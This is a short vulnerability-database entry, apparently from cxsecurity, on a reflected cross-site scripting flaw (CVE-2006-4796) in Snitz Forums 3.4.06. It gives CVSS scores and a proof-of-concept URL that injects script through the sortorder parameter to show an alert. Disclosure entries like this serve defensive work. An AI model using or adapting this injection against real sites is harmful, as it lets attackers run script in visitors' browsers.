Snitz Forums 2000 v3.4.06

2006.09.19
Credit: ajann
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2006-4796
CWE: CWE-Other


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

ENGLISH # Title : Snitz Forums 3.4.06 XSS Vulnerability # Author : ajann # HomePage : http://forum.snitz.com # [CODE] http://target.com/[path]/forum.asp?FORUM_ID=1&ARCHIVE=true&sortfield=las tpost&sortorder="><script>function%20xssbaslat(){alert("Xss%20Here");}</ script><body%20onload="xssbaslat()"> etc..


See this note in RAW Version
Vote for this issue:
50%
50%

Comment it here.
Copyright 2025, cxsecurity.com

 

Back to Top